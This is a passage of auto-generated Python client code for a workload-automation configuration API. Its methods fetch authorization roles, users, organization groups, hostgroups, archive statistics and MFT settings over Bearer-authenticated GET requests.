if kwargs.get('async_req'):
return self.get_all_authorization_roles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_authorization_roles_with_http_info(**kwargs) # noqa: E501
return data
def get_all_authorization_roles_with_http_info(self, **kwargs): # noqa: E501
"""Get Authorization Roles # noqa: E501
Get Authorization Roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_authorization_roles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name.
:param str description: The Role description.
:return: RoleHeaderList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['role', 'description'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_authorization_roles" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'role' in params:
query_params.append(('role', params['role'])) # noqa: E501
if 'description' in params:
query_params.append(('description', params['description'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/roles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RoleHeaderList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_organization_groups(self, **kwargs): # noqa: E501
"""Get All organization groups # noqa: E501
Get All organization groups # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_organization_groups(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str organizationgroup: The organization group name.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_organization_groups_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_organization_groups_with_http_info(**kwargs) # noqa: E501
return data
def get_all_organization_groups_with_http_info(self, **kwargs): # noqa: E501
"""Get All organization groups # noqa: E501
Get All organization groups # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_organization_groups_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str organizationgroup: The organization group name.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organizationgroup'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_organization_groups" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'organizationgroup' in params:
query_params.append(('organizationgroup', params['organizationgroup'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/organizationgroups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_roles_associated_with_organization_group(self, organizationgroup, **kwargs): # noqa: E501
"""Get Authorization Roles associated with an organization group # noqa: E501
Get Authorization Roles associated with an organization group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_roles_associated_with_organization_group(organizationgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str organizationgroup: Name of organization group (required)
:param str role: The Role name.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs) # noqa: E501
else:
(data) = self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs) # noqa: E501
return data
def get_all_roles_associated_with_organization_group_with_http_info(self, organizationgroup, **kwargs): # noqa: E501
"""Get Authorization Roles associated with an organization group # noqa: E501
Get Authorization Roles associated with an organization group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str organizationgroup: Name of organization group (required)
:param str role: The Role name.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organizationgroup', 'role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_roles_associated_with_organization_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organizationgroup' is set
if ('organizationgroup' not in params or
params['organizationgroup'] is None):
raise ValueError("Missing the required parameter `organizationgroup` when calling `get_all_roles_associated_with_organization_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organizationgroup' in params:
path_params['organizationgroup'] = params['organizationgroup'] # noqa: E501
query_params = []
if 'role' in params:
query_params.append(('role', params['role'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/organizationgroup/{organizationgroup}/roles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_users(self, **kwargs): # noqa: E501
"""Get users # noqa: E501
Get users # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user name.
:param str full_name: The user full name.
:param str description: The user description.
:return: list[UserHeader]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_users_with_http_info(**kwargs) # noqa: E501
return data
def get_all_users_with_http_info(self, **kwargs): # noqa: E501
"""Get users # noqa: E501
Get users # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user name.
:param str full_name: The user full name.
:param str description: The user description.
:return: list[UserHeader]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'full_name', 'description'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'full_name' in params:
query_params.append(('fullName', params['full_name'])) # noqa: E501
if 'description' in params:
query_params.append(('description', params['description'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[UserHeader]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_archive_statistics(self, **kwargs): # noqa: E501
"""Get Workload Archiving statistics # noqa: E501
Get list of statistical information for each Archiving rule and total information about the number of jobs that have been archived, data size of all job logs and outputs that have been archived, size of the Workload Archiving database including all tables and indexes and percentage of disk space used on the Workload Archiving server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_archive_statistics(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: RulesStatisticListSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_archive_statistics_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_archive_statistics_with_http_info(**kwargs) # noqa: E501
return data
def get_archive_statistics_with_http_info(self, **kwargs): # noqa: E501
"""Get Workload Archiving statistics # noqa: E501
Get list of statistical information for each Archiving rule and total information about the number of jobs that have been archived, data size of all job logs and outputs that have been archived, size of the Workload Archiving database including all tables and indexes and percentage of disk space used on the Workload Archiving server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_archive_statistics_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: RulesStatisticListSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_archive_statistics" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/archive/statistics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RulesStatisticListSummary', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_external_user_authorized_folders(self, name, **kwargs): # noqa: E501
"""Get MFT external user authorized folders # noqa: E501
Get MFT external user authorized folders # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_external_user_authorized_folders(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The external user name. (required)
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_external_user_authorized_folders_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_external_user_authorized_folders_with_http_info(name, **kwargs) # noqa: E501
return data
def get_external_user_authorized_folders_with_http_info(self, name, **kwargs): # noqa: E501
"""Get MFT external user authorized folders # noqa: E501
Get MFT external user authorized folders # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_external_user_authorized_folders_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The external user name. (required)
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_external_user_authorized_folders" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_external_user_authorized_folders`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/externaluser/{name}/virtualfolders', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_external_users(self, **kwargs): # noqa: E501
"""Get MFT external users that match the search criteria. # noqa: E501
Get MFT external users that match the search criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_external_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user name.
:param str email: The user email.
:param str description: The user description.
:param str company: The user company.
:param str phone_number: The user phoneNumber.
:return: list[ExternalUserData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_external_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_external_users_with_http_info(**kwargs) # noqa: E501
return data
def get_external_users_with_http_info(self, **kwargs): # noqa: E501
"""Get MFT external users that match the search criteria. # noqa: E501
Get MFT external users that match the search criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_external_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user name.
:param str email: The user email.
:param str description: The user description.
:param str company: The user company.
:param str phone_number: The user phoneNumber.
:return: list[ExternalUserData]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'email', 'description', 'company', 'phone_number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_external_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'email' in params:
query_params.append(('email', params['email'])) # noqa: E501
if 'description' in params:
query_params.append(('description', params['description'])) # noqa: E501
if 'company' in params:
query_params.append(('company', params['company'])) # noqa: E501
if 'phone_number' in params:
query_params.append(('phoneNumber', params['phone_number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/externalusers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ExternalUserData]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fts_settings(self, server, agent, **kwargs): # noqa: E501
"""Get File Transfer Server (FTS) configuration data. # noqa: E501
Get File Transfer Server (FTS) configuration data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fts_settings(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: FtsSettingsData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_fts_settings_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_fts_settings_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def get_fts_settings_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""Get File Transfer Server (FTS) configuration data. # noqa: E501
Get File Transfer Server (FTS) configuration data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fts_settings_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: FtsSettingsData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fts_settings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_fts_settings`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `get_fts_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/fts/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FtsSettingsData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_hostgroups(self, server, **kwargs): # noqa: E501
"""get Server hostgroups # noqa: E501
Get all the hostgroups of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_hostgroups(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the hostgroups belong to. (required)
:return: StringListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_hostgroups_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_hostgroups_with_http_info(server, **kwargs) # noqa: E501
return data
def get_hostgroups_with_http_info(self, server, **kwargs): # noqa: E501
"""get Server hostgroups # noqa: E501
Get all the hostgroups of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_hostgroups_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the hostgroups belong to. (required)
:return: StringListResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_hostgroups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_hostgroups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/hostgroups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StringListResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_hosts_in_group(self, server, hostgroup, **kwargs): # noqa: E501
"""get hostgroup agents # noqa: E501
Get the agents that compose the specified hostgroup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_hosts_in_group(server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the hostgroup belongs to. (required)
:param str hostgroup: The hostgroup name (required)
:return: AgentsInGroupListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_hosts_in_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501
else:
(data) = self.get_hosts_in_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501
return data
def get_hosts_in_group_with_http_info(self, server, hostgroup, **kwargs): # noqa: E501
"""get hostgroup agents # noqa: E501
Get the agents that compose the specified hostgroup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_hosts_in_group_with_http_info(server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the hostgroup belongs to. (required)
:param str hostgroup: The hostgroup name (required)
:return: AgentsInGroupListResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'hostgroup'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_hosts_in_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_hosts_in_group`") # noqa: E501
# verify the required parameter 'hostgroup' is set
if ('hostgroup' not in params or
params['hostgroup'] is None):
raise ValueError("Missing the required parameter `hostgroup` when calling `get_hosts_in_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'hostgroup' in params:
path_params['hostgroup'] = params['hostgroup'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/hostgroup/{hostgroup}/agents', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentsInGroupListResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_hub_status_details(self, node_id, **kwargs): # noqa: E501
"""Get hub status. # noqa: E501
Get hub status. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_hub_status_details(node_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str node_id: Node ID of the hub (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_hub_status_details_with_http_info(node_id, **kwargs) # noqa: E501
else:
(data) = self.get_hub_status_details_with_http_info(node_id, **kwargs) # noqa: E501
return data
def get_hub_status_details_with_http_info(self, node_id, **kwargs): # noqa: E501
"""Get hub status. # noqa: E501
Get hub status. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_hub_status_details_with_http_info(node_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str node_id: Node ID of the hub (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['node_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_hub_status_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'node_id' is set
if ('node_id' not in params or
params['node_id'] is None):
raise ValueError("Missing the required parameter `node_id` when calling `get_hub_status_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'node_id' in params:
path_params['nodeId'] = params['node_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/hub/{nodeId}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_mft_configuration(self, server, agent, **kwargs): # noqa: E501
"""Get MFT Configuration # noqa: E501
Get MFT Configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_configuration(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: MftConfigurationData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_mft_configuration_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_mft_configuration_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def get_mft_configuration_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""Get MFT Configuration # noqa: E501
Get MFT Configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_configuration_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: MftConfigurationData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mft_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_mft_configuration`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `get_mft_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/configuration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MftConfigurationData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_mft_folders(self, **kwargs): # noqa: E501
"""Get MFT virtual folders that match the search criteria. # noqa: E501
Get MFT virtual folders that match the search criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_folders(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The virtual folder name.
:return: list[FolderPropertiesData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_mft_folders_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_mft_folders_with_http_info(**kwargs) # noqa: E501
return data
def get_mft_folders_with_http_info(self, **kwargs): # noqa: E501
"""Get MFT virtual folders that match the search criteria. # noqa: E501
Get MFT virtual folders that match the search criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_folders_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The virtual folder name.
:return: list[FolderPropertiesData]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mft_folders" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
